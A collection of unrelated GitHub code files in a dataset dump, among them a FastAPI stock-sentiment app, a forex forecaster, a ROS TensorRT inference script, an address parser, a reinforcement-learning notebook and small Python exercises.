request,\"sentimenttickers\": sentimenttickers,\"news\":html,\"date_scores\":html2,\"dates\": dates,\"scores\":scores})\n\n@app.get(\"/mean_reversion\")\ndef mean_reversion(request: Request):\n stocks = pd.read_csv('C:\\\\Users\\\\pconn\\\\OneDrive\\\\Desktop\\\\Stock Picks\\\\PicksWeek22Feb.csv')\n stocks.style.set_properties(**{'text-align': 'left'})\n html = stocks.to_html(classes='ui striped table')\n return templates.TemplateResponse(\"mean_reversion.html\", {\"request\": request,\"stocks\":html})\n\n@app.get(\"/momentum_stocks\")\ndef momentum_stocks(request: Request):\n stocks = pd.read_csv('C:\\\\Users\\\\pconn\\\\OneDrive\\\\Desktop\\\\Stock Picks\\\\momentum_stocks.csv')\n stocks.style.set_properties(**{'text-align': 'left'})\n html = stocks.to_html(classes='ui striped table')\n return templates.TemplateResponse(\"momentum_stocks.html\", {\"request\": request,\"stocks\":html})\n\n@app.get('/arima')\ndef arima_model(request: Request):\n\n return templates.TemplateResponse(\"arima.html\", {\"request\": request})\n\n@app.get(\"/disclaimer\")\ndef disclaimer(request: Request):\n return templates.TemplateResponse(\"disclaimer.html\", {\"request\": request})\n\n@app.get(\"/contact\")\ndef contact(request: Request):\n return templates.TemplateResponse(\"contact.html\", {\"request\": request})\n\n@app.get(\"/resources\")\ndef resource(request: Request):\n return templates.TemplateResponse(\"resources.html\", {\"request\": request})\n\n@app.get(\"/home\")\ndef home(request: Request):\n return templates.TemplateResponse(\"home.html\", {\"request\": request})\n\n@app.get(\"/twitter_sentiment\")\ndef twitter_sentiment(request: Request):\n twittersentimenttickers = \"\"\n return templates.TemplateResponse(\"twitter_sentiment.html\", {\"request\": request,\"twittersentimenttickers\": twittersentimenttickers})\n\n@app.post(\"/twitter_sentiment\")\ndef twitter_sentiment_form(request: Request,twitterticker: str = Form(...)):\n twittersentimenttickers = twitterticker\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n 
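# Classic OAuth 1.0a user-context flow; tweepy.Cursor(api.search, ...) below\n    # assumes the pre-v4 tweepy API, where api.search was not yet api.search_tweets.\n    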
auth.set_access_token(access_token_key, access_token_secret)\n api = tweepy.API(auth)\n def fetch_tweets(hashtag):\n tweet_user = []\n tweet_time = []\n tweet_string = []\n for tweet in tweepy.Cursor(api.search,q=hashtag, count=2000).items(2000):\n if (not tweet.retweeted) and (\"RT @\" not in tweet.text):\n if tweet.lang == \"en\":\n tweet_user.append(tweet.user.name)\n tweet_time.append(tweet.created_at)\n tweet_string.append(tweet.text)\n\n df = pd.DataFrame({\"username\":tweet_user, \"time\": tweet_time, \"tweet\": tweet_string})\n return df\n df = fetch_tweets(twittersentimenttickers)\n df[\"sentiment\"] = df[\"tweet\"].apply(lambda tweet: TextBlob(tweet).sentiment.polarity)\n df_pos = df[df[\"sentiment\"] > 0.0]\n df_neg = df[df[\"sentiment\"] < 0.0]\n new_df = df[['tweet', 'sentiment']].copy()\n positive = len(df_pos)\n negative = len(df_neg)\n new_df.rename(columns={ new_df.columns[1]: \"Sentiment Score\" }, inplace = True)\n new_df.rename(columns={ new_df.columns[0]: \"Tweet\" }, inplace = True)\n html2 = new_df.head().to_html(classes='ui striped table')\n tickersearch = yf.Ticker(twittersentimenttickers)\n Close = tickersearch.info['previousClose']\n Open = tickersearch.info['regularMarketOpen']\n High = tickersearch.info['regularMarketDayHigh']\n Low = tickersearch.info['dayLow']\n Volume = tickersearch.info['volume']\n high52 = tickersearch.info['fiftyTwoWeekHigh']\n low52 = tickersearch.info['fiftyTwoWeekLow']\n data = tickersearch.history()\n last_quote = (data.tail(1)['Close'].iloc[0])\n \n return templates.TemplateResponse(\"twitter_sentiment.html\", {\"request\": request,\"twittersentimenttickers\": twittersentimenttickers,\"positive\":positive,\"negative\":negative,\"posts\":html2,\"Close\":Close,\"Open\":Open,\"High\":High,\"Low\":Low,\"Volume\":Volume,\"high52\":high52,\"low52\":low52,\"last_quote\":last_quote})\n\n","repo_name":"paulc160/FullStackStocksWebApplication","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15153392589","text":"import numpy as np\nimport pandas as pd\n\nfrom forecast_model import __version__ as _version\nfrom forecast_model.config.core import config\nfrom forecast_model.processing.data_manager import load_pipeline\n\n\npipeline_file_name = f\"{config.app_config.pipeline_save_file}{_version}.pkl\"\n_forecast_pipe = load_pipeline(file_name=pipeline_file_name)\n\ndef get_forecast(*,forecast_period: int,) -> dict:\n \"\"\"Make a prediction using a saved model pipeline.\"\"\"\n\n #results = {\"predictions\": None, \"version\": _version, \"errors\": errors}\n\n errors = None\n\n\n try:\n future_df = _forecast_pipe.make_future_dataframe(periods = forecast_period, freq='B')\n forecast = _forecast_pipe.predict(future_df)\n #take only the predictions out of the DataFrame\n predictions = forecast.iloc[-forecast_period:]\n forecast_dates = list(predictions['ds'])\n forecast_prices = list(predictions['yhat'])\n\n except TypeError:\n errors = 'Oops! 
Looks like your forecast time frame is not valid'\n        forecast_dates, forecast_prices = [], []\n\n    results = {\"forecast_dates\": forecast_dates, \"forecast_prices\": forecast_prices,\"version\": _version, \"errors\": errors}\n\n    return results\n","repo_name":"Olaitan94/CAD-USD-Price-Forecast","sub_path":"CADUSD_forecast_package/forecast_model/forecast.py","file_name":"forecast.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"72182555366","text":"#!/usr/bin/env python3\n# -*-coding:utf-8 -*-\nimport os\nimport torch\nimport torch.nn as nn\nimport sys\nimport numpy as np\nimport rospy\nfrom std_msgs.msg import Float64MultiArray\nimport time\nimport tensorrt as trt\nimport pycuda.driver as cuda\nimport pycuda.autoinit\nrepo_path, _ = os.path.split(os.path.realpath(__file__))\nrepo_path, _ = os.path.split(repo_path)\nsys.path.append(repo_path)\nfrom OCNet.common.seed import seed_all\nfrom OCNet.common.config import CFG\nfrom OCNet.common.dataset import get_dataset\nfrom OCNet.common.logger import get_logger\nfrom OCNet.common.io_tools import dict_to, _create_directory\nimport OCNet.data.io_data as SemanticKittiIO\n\n\ndef load_engine(trt_runtime, engine_path):\n    with open(engine_path, 'rb') as f:\n        engine_data = f.read()\n    engine = trt_runtime.deserialize_cuda_engine(engine_data)\n    return engine\n\n\ndef run_trt_model(context, input_data, trt_engine):\n    inputs, outputs, bindings = [], [], []\n    for binding in trt_engine:\n        size = trt.volume(trt_engine.get_binding_shape(binding)) * trt_engine.max_batch_size\n        dtype = trt.nptype(trt_engine.get_binding_dtype(binding))\n        host_mem = cuda.pagelocked_empty(size, dtype)\n        device_mem = cuda.mem_alloc(host_mem.nbytes)\n\n        bindings.append(int(device_mem))\n        if trt_engine.binding_is_input(binding):\n            inputs.append({\"host_mem\": host_mem, \"device_mem\": device_mem, \"binding\": binding})\n        else:\n            outputs.append({\"host_mem\": host_mem, \"device_mem\": device_mem, \"binding\": binding})\n\n    stream = cuda.Stream()\n    # Copy the input into the front of the pagelocked buffer, which may be\n    # larger than the input itself (it is sized for max_batch_size).\n    input_volume = np.prod(input_data.shape)\n    np.copyto(inputs[0][\"host_mem\"][:input_volume], input_data.ravel())\n\n    cuda.memcpy_htod_async(inputs[0][\"device_mem\"], inputs[0][\"host_mem\"], stream)\n    context.execute_async_v2(bindings=bindings, stream_handle=stream.handle)\n    cuda.memcpy_dtoh_async(outputs[0][\"host_mem\"], outputs[0][\"device_mem\"], stream)\n    stream.synchronize()\n\n    return outputs[0][\"host_mem\"].reshape(1, -1)\n\n\ndef publish_coordinates(coordinates, publisher):\n    coordinates = coordinates[:, [0, 2, 1]]\n    coordinates_msg = Float64MultiArray()\n\n    for coordinate in coordinates:\n        print(f\"coordinate : {coordinate}\")\n        coordinates_msg.data.extend(coordinate)\n\n    publisher.publish(coordinates_msg)\n\n\ndef test(trt_model_path, dset, _cfg, logger, out_path_root, coordinates_publisher):\n    device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n    dtype = torch.float32\n\n    inv_remap_lut = dset.dataset.get_inv_remap_lut()\n    inference_time = []\n    trt_runtime = trt.Runtime(trt.Logger(trt.Logger.WARNING))\n    engine = load_engine(trt_runtime, trt_model_path)\n    context = engine.create_execution_context()\n\n    with torch.no_grad():\n        for t, (data, indices) in enumerate(dset):\n\n            data = dict_to(data, device, dtype)\n            input_data = data['3D_OCCUPANCY'].cpu().numpy()\n            # Record 
the inference start time\n            inference_start_time = time.time()\n\n            result = run_trt_model(context, input_data, engine)\n            print(\"Result shape:\", result.shape)\n            # Record the inference end time\n            inference_end_time = time.time()\n            \n            # Log the inference time of each sample\n            inference_time.append(inference_end_time - inference_start_time)\n\n            # The engine returns flat logits; reshape to (batch, class, W, H, D)\n            # before the per-voxel argmax (20 SemanticKITTI classes assumed).\n            scores = np.argmax(result.reshape(1, 20, 256, 32, 256), axis=1)\n            curr_index = 0\n            for score in scores:\n                # voxel occupancy file\n                input_filename = dset.dataset.filepaths['3D_OCCUPANCY'][indices[curr_index]]\n                print(input_filename)\n\n                # Read the voxel occupancy from the file\n                voxel_occupancy = SemanticKittiIO._read_occupancy_SemKITTI(input_filename)\n\n                # Reshape the voxel occupancy array to the correct dimensions\n                voxel_occupancy = voxel_occupancy.reshape(256, 32, 256)\n\n                # Create a mask for occupied voxels\n                voxel_mask = voxel_occupancy.ravel() == 1\n\n                # Count the occupied voxels in the voxel file\n                voxel_occupied_count = np.count_nonzero(voxel_mask)\n\n                # Create a mask for occupied voxels in scores\n                score_mask = score.ravel() > 0\n\n                # Count the occupied voxels in scores\n                score_occupied_count = np.count_nonzero(score_mask)\n\n                # Compute the intersection of occupied voxels in both score and voxel_occupancy\n                intersection = np.logical_and(voxel_mask, score_mask)\n\n                # Count the intersected occupied voxels\n                intersection_count = np.count_nonzero(intersection)\n\n                # Compute the non-intersected occupied voxels coordinates in voxel_occupancy\n                non_intersection = np.logical_and(score_mask, np.logical_not(voxel_mask))\n\n                # Get the non-intersected occupied voxel coordinates\n                non_intersection_coordinates = np.column_stack(np.nonzero(non_intersection.reshape(256, 32, 256)))\n\n                publish_coordinates(non_intersection_coordinates, coordinates_publisher)\n                \n                score = np.moveaxis(score, [0, 1, 2], [0, 2, 1]).reshape(-1).astype(np.uint16)\n                score = inv_remap_lut[score].astype(np.uint16)\n                \n                \n                filename, extension = os.path.splitext(os.path.basename(input_filename))\n                out_filename = os.path.join(out_path_root, 'predictions', filename + '.label')\n                _create_directory(os.path.dirname(out_filename))\n                score.tofile(out_filename)\n                # shutil.copy(input_filename, ori_voxels_path)\n                os.remove(input_filename)\n                curr_index += 1\n        \n    return inference_time\n\n\ndef main():\n    rospy.init_node(\"inference_node\")\n    #Create the publisher using a specific ROS message type and topic\n    coordinates_publisher = rospy.Publisher('/non_intersection_coordinates', Float64MultiArray, queue_size=1000)\n\n    \n    torch.backends.cudnn.enabled = False\n    seed_all(0)\n    weights_f = rospy.get_param('~weights_file')\n    dataset_f = rospy.get_param('~dataset_root')\n    out_path_root = rospy.get_param('~output_path')\n\n    assert os.path.isfile(weights_f), '=> No file found at {}'.format(weights_f)\n\n    checkpoint_path = torch.load(weights_f)\n    config_dict = checkpoint_path.pop('config_dict')\n    config_dict['DATASET']['ROOT_DIR'] = dataset_f\n\n    _cfg = CFG()\n    _cfg.from_dict(config_dict)\n    logger = get_logger(out_path_root, 'logs_test.log')\n    logger.info('============ Test weights: \"%s\" ============\\n' % weights_f)\n\n    wait_time = 2 # Seconds to wait before checking the dataset folder again\n    train_batch_size = 6 # Set your desired batch size here\n    \n    while not rospy.is_shutdown():\n        \n        dataset = None\n        while dataset is None:\n            # Check if the dataset folder has sufficient data (files) for the batch size\n            dataset_files = 
os.listdir(dataset_f)\n if len(dataset_files) >= train_batch_size:\n dataset = get_dataset(_cfg)['test']\n else:\n rospy.loginfo(\"Waiting for dataset folder to accumulate sufficient files.\")\n rospy.sleep(wait_time)\n \n logger.info('=> Loading network architecture...')\n trt_model_path = \"/home/melodic/Aerial-Walker/src/ocnet_ros/OCNet/weight/LMSCNet.trt\"\n rate = rospy.Rate(10)\n inference_time = test(trt_model_path, dataset, _cfg, logger, out_path_root, coordinates_publisher)\n logger.info('Inference time per frame is %.4f seconds\\n' % (np.sum(inference_time) / 6.0))\n logger.info('=> ============ Network Test Done ============')\n rate.sleep()\n\n \nif __name__ == '__main__':\n main()","repo_name":"jmwang0117/Aerial-Walker","sub_path":"src/ocnet_ros/OCNet/inference_trt.py","file_name":"inference_trt.py","file_ext":"py","file_size_in_byte":8198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31057972035","text":"from colorama import Fore\n\n# colocando uma biblioteca para cores!\nrepetir = \"sim\"\nsenha = int(9981)\nl_nomes = [\"Lucas\", \"João\", \"Gabriel\"]\n\nwhile repetir == \"sim\":\n u_nome = input(\"Digite o nome do usuário: \").capitalize()\n\n while u_nome not in l_nomes:\n u_nome = input(\n \"Nome de usuário não encontrado! Tente novamente: \").capitalize()\n\n u_senha = int(input(\"Digite a senha de acesso: \"))\n\n for i in range(0, 3):\n if u_senha == senha:\n break\n else:\n print(f\"Senha incorreta tente novamente!\")\n u_senha = int(\n input(f\"Digite a senha novamente! Restam apenas: {2-i} tentativas: \"))\n\n print(\"FIM\")\n repetir = input(\"Deseja repetir a operação? 'sim' ou 'não': \").lower()\n","repo_name":"AllexAldir/OFM","sub_path":"Projetos_/Projetos_python/ptr01.py","file_name":"ptr01.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11530180478","text":"\n\n\n\n\n\nimport pandas as pd\nimport json\nfrom urllib.request import urlopen\nimport csv\nimport wget\nimport os\nimport io\nimport re\n\n#import the central json file\n#orga=\"statistisches-amt-kanton-zuerich\"\norga=\"statistisches-amt-kanton-basel-stadt\"\nurl=\"https://ckan.opendata.swiss/api/3/action/package_search?fq=organization:\"+orga+\"&rows=1000\"\njson_url = urlopen(url)\ndata = json.load(json_url)\n\ncomplex_simple=\"complex\"\n\ntitles=[]\npublishers=[]\ntexts=[]\n\ndef pasteme(input1,input2):\n return str(input1)+\" \"+str(input2)\n\n\nfor i,entry in enumerate(data['result']['results']):\n output=\"\"\n print(i,\":\",entry['identifier'],\" \",entry['title_for_slug'])\n output=pasteme(output,entry['title']['de'])\n \n \n if complex_simple==\"complex\":\n output=pasteme(output,entry['description']['de'])\n \n \n for j,obj in enumerate(entry['resources']):\n output=pasteme(output,obj['display_name']['de'])\n output=pasteme(output,obj['title']['de'])\n output=pasteme(output,obj['description']['de'])\n output=pasteme(output,obj['name']['de'])\n\n\n\n\n for j,obj in enumerate(entry['keywords']['de']):\n output=pasteme(output,obj)\n\n for j,obj in enumerate(entry['relations']):\n output=pasteme(output,obj['label'])\n\n for j,obj in enumerate(entry['tags']):\n output=pasteme(output,obj['display_name'])\n\n for j,obj in enumerate(entry['groups']):\n output=pasteme(output,obj['display_name']['de'])\n \n print(output)\n titles.append(str(entry['title_for_slug']))\n publishers.append(str(entry['publishers'][0]['label']))\n 
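# one row per dataset: slug, publisher, and the concatenated metadata text\n    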
texts.append(output)\n    \n    \ndf = pd.DataFrame(zip(titles,publishers,texts), columns=['title_slug', 'publisher','text'])\ndf.to_csv('data_matching/'+orga+'.csv',index=False)\n","repo_name":"groovytron/statbot","sub_path":"LOD02_Matching.py","file_name":"LOD02_Matching.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"}
{"seq_id":"38994631431","text":"import sys\n\ndef readMultipleLinesTwo():\n\tN = 1000000\n\tprint(sum([int(input()) for i in range(N)]))\n\ndef readMultipleLinesOne(): \n\tN = 1000000\n\tS = 0\n\tfor i in range(N):\n\t\tS += int(input())\n\tprint(S)\n\ndef readOneLine(): \n\tS = sum(list(map(int, input().split())))\n\tprint(S)\n\ndef main():\n\ttry:\n\t\tX = int(sys.argv[1])\n\t\tif X == 1: \n\t\t\treadOneLine()\n\t\telif X == 2:\n\t\t\treadMultipleLinesOne()\n\t\telif X == 3: \n\t\t\treadMultipleLinesTwo()\n\texcept (IndexError, ValueError) as error:\n\t\t# argv parsing raises these; getopt was never imported or used here\n\t\tprint(error)\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"antsaukk/libalgos","sub_path":"python-benchmark-stdin/pybench.py","file_name":"pybench.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"30572058416","text":"import asyncio\nimport random\n\nfrom .exceptions import SubscriptionError\n\nclass Subscription:\n    '''Tracks the status of a subscription.\n    The ready property can be used to determine if a subscription is ready.\n    The error property can be used to determine if a subscription encountered an error.\n    '''\n    \n    def __init__(self, name):\n        self._id = str(random.randint(0, 1000000))\n        self._name = name\n        \n        self.ready = False\n        self.error = None\n        \n        self._ready_event = asyncio.Event()\n\n    def __ready__(self):\n        self._ready_event.set()\n    \n    def __error__(self, error):\n        self.error = error\n        self._ready_event.set()\n    \n    async def wait(self):\n        '''This coroutine waits for the subscription to become ready.\n        If the server responds with an error then a ddp_asyncio.SubscriptionError will be raised.\n        '''\n        \n        await self._ready_event.wait()\n        if self.error: raise SubscriptionError(self.error.get('message', self.error))\n","repo_name":"hunternet93/ddp_asyncio","sub_path":"ddp_asyncio/subscription.py","file_name":"subscription.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"}
{"seq_id":"29836507504","text":"class AzureOpenAIRequestHistoryDTO:\r\n    \r\n    Prompt : str = None\r\n    Type : str = None\r\n    \r\n    def __init__(self, Prompt, Type):\r\n        self.Prompt = Prompt\r\n        self.Type = Type\r\n\r\nclass AzureOpenAIRequestDTO:\r\n\r\n    Prompt : str = None\r\n    Index : str = None\r\n    Model : str = None\r\n    History : list[AzureOpenAIRequestHistoryDTO] = []\r\n\r\n    def __init__(self, Prompt : str, Index : str, Model : str, History):\r\n        self.Prompt = Prompt\r\n        self.Index = Index\r\n        self.Model = Model\r\n        # start from a fresh list; appending to the class-level default would\r\n        # share history between every instance\r\n        self.History = []\r\n        \r\n        for item in History:\r\n            self.History.append(AzureOpenAIRequestHistoryDTO(**item))\r\n    \r\n    def get_system_template(self):\r\n        result = \"\"\r\n\r\n        for item in self.History:\r\n            if (item.Type == \"System\"):\r\n                result += item.Prompt + \"\\n\"\r\n\r\n        return result\r\n    \r\n    def dispose(self):\r\n        for item in self.History:\r\n            del item\r\n        
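# del only drops the loop's reference; clear() below actually empties the list\r\n        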
self.History.clear()\r\n","repo_name":"vaylonn/azure-gpt","sub_path":"AzureOpenAIRequest.py","file_name":"AzureOpenAIRequest.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11653823817","text":"# Python program to combine two dictionary adding values for common keys\n\ndict_1 = {'x': 10, 'y': 25, 'z': 12, 'u': 18}\ndict_2 = {'x': 30, 'y': 17, 'z': 51, 't': 8}\ndict_3 = {}\n\ndict_1_keys = dict_1.keys()\ndict_2_keys = dict_2.keys()\n\nfor key_1 in dict_1_keys:\n for key_2 in dict_2_keys:\n if key_1 == key_2:\n dict_3[key_1] = dict_1[key_1] + dict_2[key_2]\n\n\nprint(dict_3)","repo_name":"bawa-yatin/Python-Training","sub_path":"First Week Practice Questions/Directory Questions/Q.4.py","file_name":"Q.4.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34282496561","text":"# Uses python3\n# math from https://stackoverflow.com/questions/54608210/different-summands-problem-greedy-alogrithm\nimport sys\nfrom math import floor, sqrt\n\ndef optimal_summands(n):\n summands = []\n #write your code here\n summands_count = floor((sqrt(8 * n + 1)-1) / 2)\n summands = [i for i in range(1, summands_count)]\n last_summand = int(n - summands_count * (summands_count - 1) / 2)\n\n summands.append(last_summand)\n\n return summands\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n n = int(input)\n summands = optimal_summands(n)\n print(len(summands))\n for x in summands:\n print(x, end=' ')\n","repo_name":"maris-svirksts/Data-Structures-and-Algorithms-Specialization","sub_path":"Algorithmic Toolbox/Week-3/6_maximum_number_of_prizes/different_summands.py","file_name":"different_summands.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30717200060","text":"from argparse import ArgumentParser\nimport re\nimport sys\n\nclass Address:\n \"\"\"\n This class creates an address object and has methods to use on those objects.\n \n Attributes:\n address (str): The full address of the home\n house_number (str): the house's number\n street (str): The street the house is on\n city (str): The city the house is in\n state(str): The state the house is in\n zip(str): The zip code of the home\n \n Methods:\n __repr__(): A function that returns a formal representation of the Address object\n \"\"\"\n \n def __init__(self, address):\n \"\"\"\n Create an instance of the Address class\n\n Args:\n address (string): The full address of the location\n \n Side effects:\n Creates an address object with multiple attributes and creates a regex pattern\n \n Raises:\n ValueError if the pattern does not match the address\n \"\"\"\n patt = re.compile(r\"\"\"\n (?x)\n ^(?P\\S+)\n \\s\n (?P[^,]+)\n ,\\s\n (?P.*)\n \\s\n (?P[A-Z]{2})\n \\s\n (?P\\d{5})\"\"\"\n )\n match = patt.search(address)\n if match == None:\n raise ValueError(\"The address string could not be parsed.\")\n else:\n self.address = match.group(0)\n self.house_number = match.group(\"house_number\")\n self.street = match.group(\"street\")\n self.city = match.group(\"city\")\n self.state = match.group(\"state\")\n self.zip = match.group(\"zip\") \n\n def __repr__(self):\n \"\"\"Return a formal representation of the Address object.\"\"\"\n return (\n f\"address: {self.address}\\n\"\n f\"house number: {self.house_number}\\n\"\n f\"street: {self.street}\\n\"\n 
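# adjacent f-strings inside these parentheses are concatenated implicitly\n            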
f\"city: {self.city}\\n\"\n            f\"state: {self.state}\\n\"\n            f\"zip: {self.zip}\"\n        )\n\ndef read_addresses(filepath):\n    \"\"\"A function that reads the addresses and converts them into a new list of Address objects\n\n    Args:\n        filepath (string): Path to the file that contains all of the addresses\n\n    Returns:\n        list: A list of the addresses in the form of address objects\n    \"\"\"\n    with open(filepath, 'r', encoding=\"utf-8\") as adds:\n        alladd = []\n        for line in adds:\n            line = line.strip()\n            addy = Address(line)\n            alladd.append(addy)\n    return alladd\n    \n\ndef parse_args(arglist):\n    \"\"\" Parse command-line arguments.\n    \n    Expect one mandatory argument, the path to a file of addresses.\n    \n    Args:\n        arglist (list of str): command-line arguments.\n    \n    Returns:\n        namespace: an object with one attribute, file, containing a string.\n    \"\"\"\n    parser = ArgumentParser()\n    parser.add_argument(\"file\", help=\"file containing one address per line\")\n    return parser.parse_args(arglist)\n\n\nif __name__ == \"__main__\":\n    args = parse_args(sys.argv[1:])\n    for address in read_addresses(args.file):\n        # the !r tells the f-string to use the __repr__() method to generate\n        # a string version of the address object\n        print(f\"{address!r}\\n\")\n","repo_name":"khrathore/rathore-khushboo-inst326","sub_path":"parse_addresses.py","file_name":"parse_addresses.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"86643296154","text":"# ---\n# jupyter:\n#   jupytext:\n#     formats: py:percent,ipynb\n#     text_representation:\n#       extension: .py\n#       format_name: percent\n#       format_version: '1.3'\n#       jupytext_version: 1.4.2\n#   kernelspec:\n#     display_name: Python 3\n#     language: python\n#     name: python3\n# ---\n\n# %% [markdown]\n# # 5 Review of a Minimal, SB3-compatible Environment `rampup-v1` with A2C\n\n# %%\nimport os\nimport subprocess\nimport numpy as np\nimport webbrowser\nimport gym\nfrom gym import spaces\nfrom stable_baselines3 import A2C, PPO\nfrom stable_baselines3.common.cmd_util import make_vec_env\nfrom stable_baselines3.common.callbacks import EvalCallback\nfrom stable_baselines3.common.evaluation import evaluate_policy\n\nfrom plan_opt.demand import Demand\nfrom plan_opt.demand_small_samples import four_weeks_uprising\nfrom plan_opt.envs.rampup1 import RampupEnv1\n\n# %% [markdown]\n# ### Preparation\n#\n# Demand is created deterministically from a hand-crafted blueprint of just four weeks of data for a fleet of size 1.\n# The action space is discrete; only categorical changes of equipment are allowed.\n\n# %%\ndemand = Demand(period=len(four_weeks_uprising), data=four_weeks_uprising)\ndemand.show(only_data=True)\n\n# %% [markdown]\n# Although the environment is registered with Gym as 'rampup-v1', it is imported straight from the module here. 
See notebook 05 using the registration with Gym.\n\n# %%\nenv = RampupEnv1(demand)\n\n# %%\nalgorithm = \"A2C\"\ntimesteps = 20000\ntensorboard_log = \"logs/rampup_tensorboard/\"\ntb_log_suffix = f\"{str(timesteps)[:-3]}k\"\nprint(f\"Tensorboard logs saved with suffix {tb_log_suffix}\")\n\n# %% [markdown]\n# ### Train the model\n\n# %%\n# %%time\ndeterministic = False\nmodel = A2C(\"MlpPolicy\", env, tensorboard_log=tensorboard_log, verbose=1)\nmodel.learn(\n total_timesteps=timesteps,\n eval_freq=100,\n tb_log_name=f\"A2C_train_run_{tb_log_suffix}\",\n)\n\n# %% [markdown]\n# ### Simple Evaluation\n\n# %%\nenv.fill_table = True\nobs = env._set_initial_state(initial_state_status=3)\nwhile not env.done:\n action, _states = model.predict(obs, deterministic=deterministic)\n obs, reward, done, info = env.step(action)\nenv.render()\nenv.episode_table\n\n# %% [markdown]\n# ## Evaluation\n\n# %%\n# Separate evaluation env\n# eval_env = RampupEnv1(demand)\neval_env = env\n# Use deterministic actions for evaluation (that seems like #bs)\neval_callback = EvalCallback(\n eval_env,\n best_model_save_path=\"./logs/\",\n log_path=\"./logs/\",\n eval_freq=100,\n deterministic=deterministic,\n render=False,\n)\n\neval_model = A2C(\"MlpPolicy\", eval_env, tensorboard_log=tensorboard_log, verbose=1)\neval_model.learn(\n total_timesteps=timesteps,\n callback=eval_callback,\n tb_log_name=f\"A2C_eval_run_{tb_log_suffix}\",\n)\n\n# %%\neval_env.fill_table = True\nobs = eval_env._set_initial_state(initial_state_status=3)\nwhile not eval_env.done:\n action, _states = eval_model.predict(obs, deterministic=True)\n obs, reward, done, info = eval_env.step(action)\neval_env.render()\neval_env.episode_table\n\n# %%\nmean_reward, std_reward = evaluate_policy(eval_model, eval_env)\nprint(\n f\"Policy evaluated for 10 episodes with a mean reward of {int(mean_reward)} and a standard deviation of {int(std_reward)}.\"\n)\n\n# %% [markdown]\n# ### Tensorboard\n# Start Tensorboard on port 6006 and open it in a browser.\n\n# %%\nif 1 == 0:\n pid = subprocess.Popen(\n [\"tensorboard\", \"--logdir\", f\"./{tensorboard_log}\", \"--port\", \"6006\"]\n )\n os.system(\"sleep 5\")\n webbrowser.open(\"http://localhost:6006\")\n\n# %%\n# Alternatively, load the TensorBoard notebook extension\n# # %load_ext tensorboard\n# # %tensorboard --logdir ./rampup_tensorboard/\n\n# %% [markdown]\n# To wrap up, kill the Tensorboard process.\n\n# %%\nif 1 == 0:\n os.system(\"kill -9 $(lsof -t -i:6006)\")\n\n# %%\n","repo_name":"sebas-seck/plan-opt","sub_path":"nb_05_alg_minimal_rampup-v1.py","file_name":"nb_05_alg_minimal_rampup-v1.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27991304701","text":"from django.core.paginator import Paginator\nfrom django.db.models import Q\nfrom django.shortcuts import render\n\nfrom mywebsite.models import Question\n\n\ndef index(request):\n page = request.GET.get(\"page\", 1)\n kw = request.GET.get(\"kw\", '')\n question_list = Question.objects.order_by('create_date')\n if kw:\n question_list = question_list.filter(\n Q(subject__icontains=kw) |\n Q(content__icontains=kw) |\n Q(answer__content__icontains=kw) |\n Q(author__username__icontains=kw) |\n Q(answer__author__username__icontains=kw)\n ).distinct()\n paginator = Paginator(question_list, 15)\n page_obj = paginator.get_page(page)\n context = {'question_list': page_obj}\n return render(request, 'mywebsite/question_list.html', context)\n\n\ndef 
detail(request, question_id):\n if request.method == \"POST\":\n pass\n else:\n question = Question.objects.get(id=question_id)\n return render(request, 'mywebsite/question_detail.html', {'question': question})\n","repo_name":"gmyun1999/django_practice","sub_path":"mywebsite/views/base_views.py","file_name":"base_views.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36834838411","text":"import pickle\nimport os\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\n\n\nemotions = {\n \"01\": \"neutral\",\n \"02\": \"calm\",\n \"03\": \"happy\",\n \"04\": \"sad\",\n \"05\": \"angry\",\n \"06\": \"fearful\",\n \"07\": \"disgust\",\n \"08\": \"surprised\"\n}\n\nemotion_dict = {\n \"neutral\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n },\n \"calm\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n },\n \"happy\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n },\n \"sad\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n },\n 